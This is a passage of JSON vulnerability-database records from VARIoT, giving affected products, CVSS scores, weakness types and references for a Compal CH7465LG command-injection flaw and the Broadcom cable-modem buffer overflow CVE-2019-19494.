"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-17499",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-36912",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"id": "VAR-201910-0684",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
],
"trust": 1.1555556
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
}
]
},
"last_update_date": "2024-11-23T22:11:48.022000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
},
{
"title": "Patch for Compal CH7465LG has an unknown vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/186673"
},
{
"title": "Compal CH7465LG Fixes for other vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=99330"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://gbti.pl/public/10_2019-compal.txt"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17499"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17499"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"date": "2019-10-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"date": "2019-10-11T11:15:10.107000",
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-36912"
},
{
"date": "2019-10-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-010913"
},
{
"date": "2019-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201910-724"
},
{
"date": "2024-11-21T04:32:23.017000",
"db": "NVD",
"id": "CVE-2019-17499"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "OS command injection vulnerability in Compal CH7465LG devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-010913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201910-724"
}
],
"trust": 0.6
}
}
VAR-202001-0738
Vulnerability from variot - Updated: 2024-11-23 21:59
Broadcom based cable modems across multiple vendors are vulnerable to a buffer overflow, which allows a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim's browser. Examples of affected products include Sagemcom F@st 3890 prior to 50.10.21_T4, Sagemcom F@st 3890 prior to 05.76.6.3f, Sagemcom F@st 3686 3.428.0, Sagemcom F@st 3686 4.83.0, NETGEAR CG3700EMR 2.01.05, NETGEAR CG3700EMR 2.01.03, NETGEAR C6250EMR 2.01.05, NETGEAR C6250EMR 2.01.03, Technicolor TC7230 STEB 01.25, COMPAL 7284E 5.510.5.11, and COMPAL 7486E 5.510.5.11. Multiple Broadcom-based cable modems contain a classic buffer overflow vulnerability. Information may be acquired or falsified, and a denial of service (DoS) may result. Sagemcom F@st 5260 and Sagemcom F@st 3890 are routers. Technicolor TC7230 STEB is a wireless router.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0738",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "tc7230 steb",
"scope": "eq",
"trust": 2.4,
"vendor": "technicolor",
"version": "01.25"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.05"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.03"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.05"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 1.6,
"vendor": "netgear",
"version": "2.01.03"
},
{
"model": "f\\@st 3890",
"scope": "lt",
"trust": 1.0,
"vendor": "sagemcom",
"version": "50.10.21_t4"
},
{
"model": "7284e",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "5.510.5.11"
},
{
"model": "f\\@st 3686",
"scope": "eq",
"trust": 1.0,
"vendor": "sagemcom",
"version": "3.428.0"
},
{
"model": "f\\@st 3890",
"scope": "lt",
"trust": 1.0,
"vendor": "sagemcom",
"version": "05.76.6.3f"
},
{
"model": "7486e",
"scope": "eq",
"trust": 1.0,
"vendor": "compal",
"version": "5.510.5.11"
},
{
"model": "f\\@st 3686",
"scope": "eq",
"trust": 1.0,
"vendor": "sagemcom",
"version": "4.83.0"
},
{
"model": "f@st 3890",
"scope": "lt",
"trust": 0.8,
"vendor": "sagemcom",
"version": "05.76.6.3f"
},
{
"model": "7284e",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "5.510.5.11"
},
{
"model": "7486e",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "5.510.5.11"
},
{
"model": "f@st 3890",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": null
},
{
"model": "f@st 3890",
"scope": "lt",
"trust": 0.8,
"vendor": "sagemcom",
"version": "50.10.21_t4"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.03"
},
{
"model": "c6250emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.05"
},
{
"model": "f@st 3686",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": "3.428.0"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.05"
},
{
"model": "cg3700emr",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "2.01.03"
},
{
"model": "f@st 3686",
"scope": "eq",
"trust": 0.8,
"vendor": "sagemcom",
"version": "4.83.0"
},
{
"model": "f@st \u003c50.10.21 t4",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "3890"
},
{
"model": "f@st \u003c05.76.6.3f",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "3890"
},
{
"model": "f@st",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "36863.428.0"
},
{
"model": "f@st",
"scope": "eq",
"trust": 0.6,
"vendor": "sagemcom",
"version": "36864.83.0"
},
{
"model": "compal 7486e",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "5.510.5.11"
},
{
"model": "compal 7284e",
"scope": "eq",
"trust": 0.6,
"vendor": "technicolor",
"version": "5.510.5.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"cve": "CVE-2019-19494",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-19494",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-23485",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-19494",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-19494",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-19494",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-19494",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-23485",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-311",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-19494",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Broadcom based cable modems across multiple vendors are vulnerable to a buffer overflow, which allows a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim\u0027s browser. Examples of affected products include Sagemcom F@st 3890 prior to 50.10.21_T4, Sagemcom F@st 3890 prior to 05.76.6.3f, Sagemcom F@st 3686 3.428.0, Sagemcom F@st 3686 4.83.0, NETGEAR CG3700EMR 2.01.05, NETGEAR CG3700EMR 2.01.03, NETGEAR C6250EMR 2.01.05, NETGEAR C6250EMR 2.01.03, Technicolor TC7230 STEB 01.25, COMPAL 7284E 5.510.5.11, and COMPAL 7486E 5.510.5.11. Multiple Broadcom-based cable modems contain a classic buffer overflow vulnerability. Information may be acquired or falsified, and a denial of service (DoS) may result. Sagemcom F@st 5260 and Sagemcom F@st 3890 are routers. Technicolor TC7230 STEB is a wireless router.",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-19494",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-23485",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2019-19494",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"id": "VAR-202001-0738",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
}
],
"trust": 1.2474206366666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
}
]
},
"last_update_date": "2024-11-23T21:59:31.876000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.broadcom.com/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2020/01/10/broadcom_cable_haunt_vulnerability/"
},
{
"title": "welivesecurity",
"trust": 0.1,
"url": "https://www.welivesecurity.com/2020/01/14/millions-modems-vulnerable-remote-hijacking/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/cable-haunt-remote-code-execution/151756/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/lyrebirds/cable-haunt-report/releases/download/2.4/report.pdf"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19494"
},
{
"trust": 1.7,
"url": "https://cablehaunt.com"
},
{
"trust": 1.7,
"url": "https://www.broadcom.com"
},
{
"trust": 1.7,
"url": "https://github.com/lyrebirds/fast8690-exploit"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/120.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/cable-haunt-remote-code-execution/151756/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"date": "2020-01-09T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"date": "2020-01-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"date": "2020-01-09T13:15:10.993000",
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23485"
},
{
"date": "2020-01-28T00:00:00",
"db": "VULMON",
"id": "CVE-2019-19494"
},
{
"date": "2020-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014302"
},
{
"date": "2021-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-311"
},
{
"date": "2024-11-21T04:34:50.037000",
"db": "NVD",
"id": "CVE-2019-19494"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Broadcom-based cable modems",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014302"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-311"
}
],
"trust": 0.6
}
}